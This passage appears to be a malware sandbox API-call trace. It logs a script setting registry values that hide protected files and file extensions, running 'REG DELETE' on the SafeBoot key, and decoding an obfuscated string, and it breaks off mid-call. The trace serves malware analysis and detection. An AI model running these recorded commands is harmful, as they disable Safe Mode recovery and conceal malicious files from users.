[1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f524*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\SuperHidden", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f264*=0x72a478d9) returned 0x0 [0085.111] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f280*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f284 | out: rgDispId=0x28f284*=2001) returned 0x0 [0085.111] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f4f4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234, puArgErr=0x28f264 | out: pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="0", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f4f4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f264*=0x72a478d9) returned 0x0 [0085.112] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f280*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f284 | out: rgDispId=0x28f284*=2001) returned 0x0 [0085.113] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f554*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\DefaultValue", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234, puArgErr=0x28f264 | out: pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f554*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\DefaultValue", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f264*=0x72a478d9) returned 0x0 [0085.115] WshShell:IDispatch:GetIDsOfNames (in: This=0x1072dd0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28f280*="regwrite", cNames=0x1, lcid=0x409, rgDispId=0x28f284 | out: rgDispId=0x28f284*=2001) returned 0x0 [0085.115] WshShell:IDispatch:Invoke (in: This=0x1072dd0, dispIdMember=2001, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f604*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234, puArgErr=0x28f264 | out: pDispParams=0x28f254*(rgvarg=([0]=0x28f29c*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f6b4*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="REG_DWORD", varVal2=0x753ef0d0), varVal2=0x0), [1]=0x28f2ac*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="1", varVal2=0x0), [2]=0x28f2bc*(varType=0x400c, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28f604*(varType=0x8, wReserved1=0x0, wReserved2=0xf2b8, wReserved3=0x28, varVal1="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\HideFileExt\\UncheckedValue", varVal2=0x753ef0d0), varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x28f234*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f264*=0x72a478d9) returned 0x0 [0085.116] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f268*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f2ac | out: lpCommandLine="REG DELETE HKLM\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot /f", lpProcessInformation=0x28f2ac*(hProcess=0x178, hThread=0x174, dwProcessId=0xf64, dwThreadId=0xf68)) returned 1 [0085.137] GetLastError () returned 0x0 [0085.137] WaitForInputIdle (hProcess=0x178, dwMilliseconds=0x2710) returned 0xffffffff [0085.137] CloseHandle (hObject=0x174) returned 1 [0085.137] CloseHandle (hObject=0x178) returned 1 [0085.137] FileSystemObject:IUnknown:Release (This=0x1072d28) returned 0x0 [0085.138] FileSystemObject:IUnknown:Release (This=0x1072c3c) returned 0x1 [0085.138] WshShell:IUnknown:Release (This=0x1072dd0) returned 0x0 [0085.140] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0085.140] CoCreateInstanceEx (in: Clsid=0x403560*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), punkOuter=0x0, dwClsCtx=0x5, pServerInfo=0x0, dwCount=0x4, pResults=0x28f680 | out: pResults=((pIID=0x7295a460*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pItf=0xe3b778, hr=0x0), (pIID=0x403570*(Data1=0xd8f015c0, Data2=0xc278, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), pItf=0xe3b778, hr=0x0), (pIID=0x72970540*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), pItf=0x0, hr=0x80004002), (pIID=0x72970750*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), pItf=0x0, hr=0x80004002))) returned 0x80012 [0085.148] IUnknown:Release (This=0xe3b778) returned 0x1 [0085.148] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x1a [0085.148] GetFocus () returned 0x0 [0085.148] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1b) returned 0x310bcd0 [0085.148] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x5005e, Msg=0xd, wParam=0x1b, lParam=0x310bcd0) returned 0x1a [0085.148] GetFocus () returned 0x0 [0085.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0085.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop", cbMultiByte=-1, lpWideCharStr=0xe36d44, cchWideChar=27 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop") returned 27 [0085.148] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0085.154] Shell:IShellDispatch:Explore (This=0xe3b778, vDir=0x28f6fc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\kEecfMwgj\\Desktop", varVal2=0x30f00c4)) returned 0x0 [0085.159] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ole32.dll", cbMultiByte=9, lpWideCharStr=0x28e530, cchWideChar=2047 | out: lpWideCharStr="ole32.dll(ọ瞭掞Ǒ￾￿ƛ瞩˪瞩â(") returned 9 [0085.159] SysReAllocStringLen (in: pbstr=0x28f534*=0x0, psz="ole32.dll", len=0x9 | out: pbstr=0x28f534*="ole32.dll") returned 1 [0085.160] CharLowerBuffW (in: lpsz="ole32.dll", cchLength=0x9 | out: lpsz="ole32.dll") returned 0x9 [0085.160] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76c60000 [0085.160] GetLastError () returned 0x0 [0085.193] SetLastError (dwErrCode=0x0) [0085.193] GetProcAddress (hModule=0x76c60000, lpProcName="CoTaskMemAlloc") returned 0x76caea4c [0085.200] SysReAllocStringLen (in: pbstr=0x28edd4*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x28edd4*="comctl32.dll") returned 1 [0085.200] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0085.201] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74680000 [0085.219] SysReAllocStringLen (in: pbstr=0x28ea18*=0x0, psz="LPK", len=0x3 | out: pbstr=0x28ea18*="LPK") returned 1 [0085.219] CharLowerBuffW (in: lpsz="LPK", cchLength=0x3 | out: lpsz="lpk") returned 0x3 [0085.220] GetModuleHandleW (lpModuleName="LPK") returned 0x75820000 [0085.220] GetProcAddress (hModule=0x75820000, lpProcName="LpkEditControl") returned 0x75827000 [0085.221] GetLastError () returned 0x0 [0085.221] SetLastError (dwErrCode=0x0) [0085.221] SysReAllocStringLen (in: pbstr=0x28f03c*=0x0, psz="comctl32.dll", len=0xc | out: pbstr=0x28f03c*="comctl32.dll") returned 1 [0085.221] CharLowerBuffW (in: lpsz="comctl32.dll", cchLength=0xc | out: lpsz="comctl32.dll") returned 0xc [0085.221] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x74680000 [0085.222] GetLastError () returned 0x0 [0085.222] SetLastError (dwErrCode=0x0) [0085.713] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="ADVAPI32.dll", cbMultiByte=12, lpWideCharStr=0x28c060, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll") returned 12 [0085.713] SysReAllocStringLen (in: pbstr=0x28d064*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x28d064*="ADVAPI32.dll") returned 1 [0085.714] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0085.714] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x76f40000 [0085.714] GetLastError () returned 0x0 [0085.714] SetLastError (dwErrCode=0x0) [0085.715] GetProcAddress (hModule=0x76f40000, lpProcName="RegisterTraceGuidsW") returned 0x77a9f843 [0085.716] SysReAllocStringLen (in: pbstr=0x28cca8*=0x0, psz="propsys.dll", len=0xb | out: pbstr=0x28cca8*="propsys.dll") returned 1 [0085.716] CharLowerBuffW (in: lpsz="propsys.dll", cchLength=0xb | out: lpsz="propsys.dll") returned 0xb [0085.716] LoadLibraryExW (lpLibFileName="propsys.dll", hFile=0x0, dwFlags=0x22) returned 0x738c0000 [0085.716] GetLastError () returned 0x0 [0085.716] SetLastError (dwErrCode=0x0) [0085.717] SysReAllocStringLen (in: pbstr=0x28d108*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x28d108*="advapi32.dll") returned 1 [0085.717] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0085.718] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x76f40000 [0085.718] GetProcAddress (hModule=0x76f40000, lpProcName="EventRegister") returned 0x77a9f6ba [0085.719] GetProcAddress (hModule=0x76f40000, lpProcName="EventUnregister") returned 0x77ab9241 [0085.719] GetProcAddress (hModule=0x76f40000, lpProcName="EventEnabled") returned 0x77a988e2 [0085.720] GetProcAddress (hModule=0x76f40000, lpProcName="EventWrite") returned 0x77ac0c59 [0085.721] GetProcAddress (hModule=0x76f40000, lpProcName="InitializeSecurityDescriptor") returned 0x76f54620 [0085.722] GetProcAddress (hModule=0x76f40000, lpProcName="SetEntriesInAclW") returned 0x76f52a66 [0085.771] SysReAllocStringLen (in: pbstr=0x28d544*=0x0, psz="ntmarta.dll", len=0xb | out: pbstr=0x28d544*="ntmarta.dll") returned 1 [0085.771] CharLowerBuffW (in: lpsz="ntmarta.dll", cchLength=0xb | out: lpsz="ntmarta.dll") returned 0xb [0085.772] LoadLibraryW (lpLibFileName="ntmarta.dll") returned 0x74640000 [0085.783] GetLastError () returned 0x0 [0085.783] SetLastError (dwErrCode=0x0) [0085.784] GetProcAddress (hModule=0x74640000, lpProcName="GetMartaExtensionInterface") returned 0x746421f2 [0085.785] GetProcAddress (hModule=0x76f40000, lpProcName="SetSecurityDescriptorDacl") returned 0x76f5415e [0085.812] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr="SHELL32.dll", cbMultiByte=11, lpWideCharStr=0x28d5a4, cchWideChar=2047 | out: lpWideCharStr="SHELL32.dllã") returned 11 [0085.812] SysReAllocStringLen (in: pbstr=0x28e5a8*=0x0, psz="SHELL32.dll", len=0xb | out: pbstr=0x28e5a8*="SHELL32.dll") returned 1 [0085.812] CharLowerBuffW (in: lpsz="SHELL32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0085.813] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x75cc0000 [0085.813] GetLastError () returned 0x0 [0085.813] SetLastError (dwErrCode=0x0) [0085.814] GetProcAddress (hModule=0x75cc0000, lpProcName=0x66) returned 0x75d5b7d9 [0085.844] GetProcAddress (hModule=0x75cc0000, lpProcName="SHGetInstanceExplorer") returned 0x75d06399 [0085.858] CallNextHookEx (hhk=0x900d9, nCode=0, wParam=0x1, lParam=0x28f51c) returned 0x0 [0085.859] KillTimer (hWnd=0x20372, uIDEvent=0x20372) returned 1 [0085.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0085.911] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0085.911] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.911] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0085.911] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0085.912] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0085.912] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0085.912] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0085.913] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0085.913] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0085.913] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0085.913] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0085.914] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0085.914] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0085.915] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0085.915] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0085.915] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0085.916] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0085.916] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0085.916] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0085.917] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0085.917] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0085.918] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f180, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0085.918] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f1b0 | out: pvarResult=0x28f1b0) returned 0x0 [0085.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f116, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 